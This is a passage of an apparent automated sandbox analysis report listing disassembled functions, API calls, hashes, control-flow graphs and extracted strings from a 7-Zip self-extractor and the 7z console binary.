                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                • String ID:
                                                                • API String ID: 2001801573-0
                                                                • Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                • Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
                                                                • Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                • Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
                                                                • LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC
                                                                  • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                  • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                  • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                  • Part of subcall function 0040B7A0: memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                  • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                  • Part of subcall function 0040B7A0: memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                  • Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D
                                                                  • Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B937
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
                                                                • String ID: $A$$A
                                                                • API String ID: 2633840989-464203494
                                                                • Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                • Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
                                                                • Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                • Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00402088
                                                                • GetWindowRect.USER32(?,?), ref: 004020A1
                                                                • ScreenToClient.USER32(00000000,?), ref: 004020AF
                                                                • ScreenToClient.USER32(00000000,?), ref: 004020B6
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ClientScreen$ParentRectWindow
                                                                • String ID:
                                                                • API String ID: 2099118873-0
                                                                • Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                • Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
                                                                • Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                • Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72
                                                                APIs
                                                                  • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
                                                                  • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A
                                                                • wsprintfW.USER32 ref: 00405364
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041B828,?), ref: 004053A1
                                                                Strings
                                                                • %X - %03X - %03X - %03X - %03X, xrefs: 0040535E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$??3@wsprintf
                                                                • String ID: %X - %03X - %03X - %03X - %03X
                                                                • API String ID: 1174869416-1993364030
                                                                • Opcode ID: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                • Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
                                                                • Opcode Fuzzy Hash: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                • Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@wsprintf
                                                                • String ID: (%d%s)
                                                                • API String ID: 3815514257-2087557067
                                                                • Opcode ID: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                • Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
                                                                • Opcode Fuzzy Hash: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                • Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                • GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: TextWindow$Length
                                                                • String ID: j4@
                                                                • API String ID: 1006428111-2012685699
                                                                • Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                • Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
                                                                • Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                • Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95
                                                                APIs
                                                                • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: 7-Zip SFX$Could not allocate memory
                                                                • API String ID: 2030045667-3806377612
                                                                • Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                • Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
                                                                • Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                • Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                • API String ID: 3442115484-272389550
                                                                • Opcode ID: 7760baf1af826760d5cc902eb13af7624987e20b9658c42b93d7d9b3a1d12304
                                                                • Instruction ID: 0659513c9e02d955e39c2c74a93585857128071e4dc0d621fdbddd505fbd03ec
                                                                • Opcode Fuzzy Hash: 7760baf1af826760d5cc902eb13af7624987e20b9658c42b93d7d9b3a1d12304
                                                                • Instruction Fuzzy Hash: AD72A172214A81C6DB74EF25E8903EE7361F799B82F408126DEAA4B758DF3CC559CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                • String ID:
                                                                • API String ID: 3352498445-0
                                                                • Opcode ID: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                                                • Instruction ID: d9583e14512c2c735d61d26614fc4099cd5da0cc676540f53a5abdabd1bc6b4c
                                                                • Opcode Fuzzy Hash: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                                                • Instruction Fuzzy Hash: 0D828E32218AC096CB34EF25E4913EEB360FB96B90F544126EB9D57B59DF78C985CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1635 1347ac-13485c call 113314 * 2 1640 13489a-13491b call 136344 call 1132bc call 113b5c free * 2 call 113208 call 113314 1635->1640 1641 13485e-134884 call 112880 1635->1641 1656 134921-134925 1640->1656 1657 1349bd-1349cb call 11477c 1640->1657 1641->1640 1646 134886-134895 call 113404 1641->1646 1646->1640 1656->1657 1659 13492b-13495e call 113208 call 11449c 1656->1659 1662 1349d1-1349e7 1657->1662 1663 134dff 1657->1663 1676 1349b0-1349b8 free 1659->1676 1677 134960-13496f 1659->1677 1673 1349e9-134a28 free * 4 1662->1673 1674 134a68-134ad2 call 113208 * 3 1662->1674 1665 134e02-134e05 1663->1665 1668 134e40-134e45 1665->1668 1669 134e07-134e1c call 112130 1665->1669 1671 134e47-134e58 call 113518 1668->1671 1672 134e5d-134e62 call 1170c8 1668->1672 1689 134e30 1669->1689 1690 134e1e-134e2e call 113314 1669->1690 1696 134f2c-134f98 call 123f0c 1671->1696 1687 134e67-134e6a 1672->1687 1680 134a2a 1673->1680 1681 134a58-134a63 free 1673->1681 1719 134d30-134d3b 1674->1719 1720 134ad8-134adb 1674->1720 1676->1657 1683 134971-134978 1677->1683 1684 13497a-13498b 1677->1684 1688 134a2e-134a41 1680->1688 1692 13504a-135059 free 1681->1692 1683->1684 1691 134993-134996 1683->1691 1684->1691 1687->1696 1697 134e70-134eea GetLastError call 113518 call 11362c free * 4 1687->1697 1698 134a43-134a4f free * 2 1688->1698 1699 134a54-134a56 1688->1699 1702 134e33-134e3b call 11b8f0 1689->1702 1690->1702 1691->1676 1701 134998-1349ad call 113404 1691->1701 1694 13523b-13524e 1692->1694 1714 13505e-135062 1696->1714 1715 134f9e-134fa2 1696->1715 1729 134f1a-134f27 free 1697->1729 1730 134eec 1697->1730 1698->1699 1699->1681 1699->1688 1701->1676 1702->1668 1717 135064-13506c 1714->1717 1718 13506e 1714->1718 1715->1714 1721 134fa8-134fac 1715->1721 1717->1718 1723 135071-13507d 1717->1723 1718->1723 1726 134d41-134dae call 122a84 free * 4 1719->1726 1727 134df0-134dfd call 122a84 1719->1727 1724 134b24-134b3e call 13ec5c 1720->1724 1725 134add-134ae0 1720->1725 1721->1714 1728 134fb2-134fc7 call 1232e8 1721->1728 1732 135083-1350d1 1723->1732 1733 135152-13516d 1723->1733 1752 134b44 1724->1752 1753 134c9d-134cee call 122a84 free * 4 1724->1753 1725->1724 1734 134ae2-134aee 1725->1734 1796 134db0 1726->1796 1797 134dde-134deb free 1726->1797 1727->1665 1728->1714 1751 134fcd-13500d free * 4 1728->1751 1729->1692 1737 134ef0-134f03 1730->1737 1778 135143-135150 call 11ae2c 1732->1778 1779 1350d3-1350de 1732->1779 1749 135173 1733->1749 1739 134af0-134af7 1734->1739 1740 134b4c-134b50 1734->1740 1744 134f15-134f18 1737->1744 1745 134f05-134f10 free * 2 1737->1745 1739->1740 1750 134af9-134b14 call 13b290 1739->1750 1746 134b52-134b5a 1740->1746 1747 134b60-134b63 1740->1747 1744->1729 1744->1737 1745->1744 1746->1747 1754 134bf5-134bff 1746->1754 1755 134bc1-134bc4 1747->1755 1756 134b65-134b80 call 114318 1747->1756 1757 135175-13517b 1749->1757 1781 134c0a-134c5b call 122a84 free * 4 1750->1781 1782 134b1a-134b22 1750->1782 1760 13500f 1751->1760 1761 13503d-135048 free 1751->1761 1752->1740 1774 134cf0 1753->1774 1775 134d1e-134d2b free 1753->1775 1754->1720 1763 134c05 1754->1763 1771 134be3-134bf2 call 15c7d4 1755->1771 1772 134bc6-134be1 call 1243fc 1755->1772 1793 134b82-134b85 1756->1793 1794 134b87-134b9e 1756->1794 1766 135190-13519e call 151850 1757->1766 1767 13517d-135188 call 126cd0 1757->1767 1770 135013-135026 1760->1770 1761->1692 1763->1719 1791 1351a1-1351a6 1766->1791 1767->1766 1784 135038-13503b 1770->1784 1785 135028-135033 free * 2 1770->1785 1771->1754 1772->1754 1772->1771 1792 134cf4-134d07 1774->1792 1775->1692 1778->1757 1779->1778 1795 1350e0-1350e3 1779->1795 1810 134c8b-134c98 free 1781->1810 1811 134c5d 1781->1811 1782->1740 1784->1761 1784->1770 1785->1784 1799 1351b1-1351f1 free * 4 1791->1799 1800 1351a8-1351b0 call 126cd0 1791->1800 1801 134d19-134d1c 1792->1801 1802 134d09-134d14 free * 2 1792->1802 1793->1755 1805 134ba0-134ba8 1794->1805 1806 134baf-134bb3 1794->1806 1807 1350e5-1350e7 1795->1807 1808 135138-135140 1795->1808 1809 134db4-134dc7 1796->1809 1797->1692 1813 1351f3 1799->1813 1814 135221-135239 free * 2 1799->1814 1800->1799 1801->1775 1801->1792 1802->1801 1805->1755 1815 134baa-134bad 1805->1815 1806->1755 1816 134bb5-134bbd 1806->1816 1817 13512b-135136 1807->1817 1818 1350e9-1350eb 1807->1818 1808->1778 1819 134dd9-134ddc 1809->1819 1820 134dc9-134dd4 free * 2 1809->1820 1810->1692 1823 134c61-134c74 1811->1823 1822 1351f7-13520a 1813->1822 1814->1694 1815->1755 1816->1755 1817->1778 1824 13511f-135129 1818->1824 1825 1350ed-1350f0 1818->1825 1819->1797 1819->1809 1820->1819 1828 13521c-13521f 1822->1828 1829 13520c-135217 free * 2 1822->1829 1826 134c86-134c89 1823->1826 1827 134c76-134c81 free * 2 1823->1827 1824->1778 1830 135112-13511d 1825->1830 1831 1350f2-135111 _CxxThrowException 1825->1831 1826->1810 1826->1823 1827->1826 1828->1814 1828->1822 1829->1828 1830->1778 1831->1830
                                                                APIs
                                                                Strings
                                                                • Can not create output directory: , xrefs: 00134E83
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove$ErrorExceptionLastThrow
                                                                • String ID: Can not create output directory:
                                                                • API String ID: 4159955631-3123869724
                                                                • Opcode ID: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                                                • Instruction ID: e301e462e5c2bb68366a7bd1bd957dad48afb632d78a47317b07e5068c21af6f
                                                                • Opcode Fuzzy Hash: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                                                • Instruction Fuzzy Hash: 93425C22219AC096CB34EB25E8903EEB361F7D6B80F545222DB9D57B59DF38C995CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2037 135458-1354e2 2038 1354f2-1354f6 2037->2038 2039 1354e4-1354f0 2037->2039 2040 1354fe-135504 2038->2040 2039->2040 2041 13550a 2040->2041 2042 1355ec-1355fd 2040->2042 2043 13550d-135538 call 117d28 call 113208 2041->2043 2044 135612-135615 2042->2044 2045 1355ff-13560a call 112130 2042->2045 2060 13553a-13554c call 117ebc 2043->2060 2061 13556c-13559c call 11b8f0 free 2043->2061 2048 135617-13561f memset 2044->2048 2049 135624-135639 call 112130 2044->2049 2045->2044 2048->2049 2055 13563b-13563e call 123524 2049->2055 2056 135648 2049->2056 2063 135643-135646 2055->2063 2059 13564b-135656 2056->2059 2065 135662-1356d1 call 1343b0 2059->2065 2066 135658-135661 2059->2066 2067 135551-135554 2060->2067 2061->2043 2072 1355a2 2061->2072 2063->2059 2077 1356d3-1356e3 2065->2077 2078 1356fd-135715 2065->2078 2066->2065 2070 135556-135562 2067->2070 2071 1355a4-1355c7 _CxxThrowException 2067->2071 2075 135564 2070->2075 2076 1355c8-1355eb _CxxThrowException 2070->2076 2071->2076 2072->2042 2075->2061 2076->2042 2077->2078 2085 1356e5-1356f8 free 2077->2085 2079 13571b-13571e 2078->2079 2080 135f1d-135f22 2078->2080 2082 135726-13572a 2079->2082 2083 135f24-135f27 2080->2083 2084 135f29-135f3d 2080->2084 2086 135730-13575f call 117d28 call 113208 2082->2086 2087 135c37-135c50 2082->2087 2083->2084 2088 135f8d-136002 free * 2 2083->2088 2092 135f54-135f67 2084->2092 2093 135f3f-135f52 free 2084->2093 2097 135f7c-135f8b free 2085->2097 2104 135772-13577e call 117ebc 2086->2104 2105 135761-135770 2086->2105 2087->2082 2090 135c56-135c5a 2087->2090 2099 136004-136017 2088->2099 2090->2080 2092->2088 2103 135f69-135f7b free 2092->2103 2093->2097 2097->2099 2103->2097 2109 135783-135786 2104->2109 2106 13579e-1357b4 call 151544 2105->2106 2113 1357ba-13586c call 134504 call 1342a8 call 1340c4 call 113404 call 144c00 2106->2113 2114 135c5f-135c80 free * 2 2106->2114 2110 135ef9-135f1c _CxxThrowException 2109->2110 2111 13578c-135798 2109->2111 2110->2080 2111->2106 2111->2110 2126 13586e-135876 2113->2126 2127 13587d-135883 2113->2127 2114->2097 2128 135889-1358b3 call 151bc0 2126->2128 2129 135878 2126->2129 2127->2128 2130 135c85-135c9e free 2127->2130 2136 135d02-135d1e free 2128->2136 2137 1358b9-1358bc 2128->2137 2129->2127 2131 135ca0 2130->2131 2132 135cbe-135cfd free call 134610 free * 2 2130->2132 2134 135ca4-135cbc free 2131->2134 2132->2097 2134->2132 2134->2134 2141 135d20 2136->2141 2142 135d3e-135d7b free call 134610 free * 2 2136->2142 2139 1358c2-1358d3 2137->2139 2140 1359b1-1359bd 2137->2140 2143 135933 2139->2143 2144 1358d5-135907 call 117d28 call 113208 call 117ebc 2139->2144 2145 1359c3-1359cd 2140->2145 2146 135a8e-135a93 2140->2146 2148 135d24-135d3c free 2141->2148 2142->2097 2150 135936-13594f free 2143->2150 2195 135924-135931 free 2144->2195 2196 135909-135915 2144->2196 2153 1359d3-1359e1 2145->2153 2154 135a95-135a9a 2145->2154 2152 135aa1-135ab9 2146->2152 2148->2142 2148->2148 2156 135951 2150->2156 2157 13596f-1359ac free call 134610 free 2150->2157 2161 135abb-135ac3 2152->2161 2162 135acc 2152->2162 2159 1359e3-1359ed 2153->2159 2160 135a55-135a58 2153->2160 2154->2152 2164 135955-13596d free 2156->2164 2157->2087 2169 1359f5-135a11 call 134434 2159->2169 2165 135a5a-135a86 2160->2165 2166 135a9c 2160->2166 2161->2162 2170 135ac5-135aca 2161->2170 2171 135acf-135b54 call 1347ac 2162->2171 2164->2157 2164->2164 2182 135d80-135d9c free 2165->2182 2183 135a8c 2165->2183 2166->2152 2185 135a13-135a15 2169->2185 2186 135a21-135a30 2169->2186 2170->2171 2180 135b5a-135b61 2171->2180 2181 135dfe-135e1a free 2171->2181 2189 135b63-135b7e 2180->2189 2190 135b80 2180->2190 2193 135e3a-135e77 free call 134610 free * 2 2181->2193 2194 135e1c 2181->2194 2191 135d9e 2182->2191 2192 135dbc-135df9 free call 134610 free * 2 2182->2192 2183->2152 2185->2186 2187 135a17-135a1d 2185->2187 2186->2169 2188 135a32-135a52 2186->2188 2187->2186 2188->2160 2197 135b88-135bb6 2189->2197 2190->2197 2198 135da2-135dba free 2191->2198 2192->2097 2193->2097 2200 135e20-135e38 free 2194->2200 2195->2150 2196->2195 2202 135917-13591f 2196->2202 2203 135e7c-135e95 free 2197->2203 2204 135bbc-135bd6 free 2197->2204 2198->2192 2198->2198 2200->2193 2200->2200 2202->2195 2207 135e97 2203->2207 2208 135eb5-135ef4 free call 134610 free * 2 2203->2208 2209 135bd8-135bdc 2204->2209 2210 135bff-135c12 free call 134610 2204->2210 2212 135e9b-135eb3 free 2207->2212 2208->2097 2214 135bde-135bf5 free 2209->2214 2219 135c17-135c35 free 2210->2219 2212->2208 2212->2212 2214->2214 2218 135bf7 2214->2218 2218->2210 2219->2087
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrow$memset
                                                                • String ID: can't decompress folder$there is no such archive
                                                                • API String ID: 4182836161-2069749860
                                                                • Opcode ID: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                                                • Instruction ID: f1ad2f472d14bc74ebd710736e13086e4dd5fe2c28ed2c9bf51a8fb82a6e89ee
                                                                • Opcode Fuzzy Hash: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                                                • Instruction Fuzzy Hash: 6C525A32209AC096CB24DF25E4843AEB765F796BD4F455222DF9E53B29DF38C895CB00
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                                                • Instruction ID: 6f96bd030aa157814ee7a24321d8cb88724fb30a2ae5e9fe1092f23f14a76396
                                                                • Opcode Fuzzy Hash: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                                                • Instruction Fuzzy Hash: C942833B609AC086CB24DF25E0946AF7765F7DAB88F561025EB4E47B25CF39C49AC700
                                                                APIs
                                                                Strings
                                                                • Unsupported -spf:, xrefs: 00120F7E
                                                                • I won't write data and program's messages to same stream, xrefs: 001214B3, 00121782
                                                                • Cannot use absolute pathnames for this command, xrefs: 0012138C
                                                                • -ai switch is not supported for this command, xrefs: 001215C3
                                                                • The command must be specified, xrefs: 00120DF5
                                                                • Cannot find archive name, xrefs: 0012110A
                                                                • Unsupported command:, xrefs: 00120E57
                                                                • Archive name cannot by empty, xrefs: 00121151
                                                                • I won't write compressed data to a terminal, xrefs: 00121741
                                                                • Incorrect Number of benmchmark iterations, xrefs: 00121847
                                                                • Only one archive can be created with rename command, xrefs: 001217E1
                                                                • stdout mode and email mode cannot be combined, xrefs: 00121710
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
